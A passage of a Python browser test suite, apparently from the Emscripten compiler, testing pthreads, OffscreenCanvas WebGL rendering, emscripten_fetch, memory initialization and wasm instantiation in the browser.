self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'TOTAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME=1'], also_asmjs=True)
# Test that STACK_BASE and STACK_MAX correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS', '-std=c++11'])
@no_fastcomp('-s SAFE_STACK is only supported on WASM backend')
@requires_threads
def test_pthread_safe_stack(self):
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'SAFE_STACK', '-s', 'DEFAULT_PTHREAD_STACK_SIZE=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('LSan is only supported on WASM backend')
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('ASan is only supported on WASM backend')
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@no_fastcomp('ASan is only supported on WASM backend')
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
@no_wasm_backend('mem init file')
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
@no_wasm_backend('mem init file')
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
@no_wasm_backend('asm.js')
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
create_test_file('one.html', '<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
create_test_file('two.html', '''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
self.assertExists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
@no_wasm_backend('emterpretify - bytecode in a file')
def test_emterpretify_file(self):
create_test_file('shell.html', '''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
self.compile_btest(['src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
self.clear()
os.makedirs('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
@no_fastcomp('not optimized in fastcomp')
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5754), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
self.skipTest('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'])
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'USE_WEBGL2=0', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'USE_WEBGL2=0'],
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'USE_WEBGL2=1'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1']
if asyncify:
if not self.is_wasm_backend():
continue
# given the synchronous render loop here, asyncify is needed to see intermediate frames and the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_wasm_backend("fetch API uses an asm.js based web worker to run synchronous XHRs and IDB operations")
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
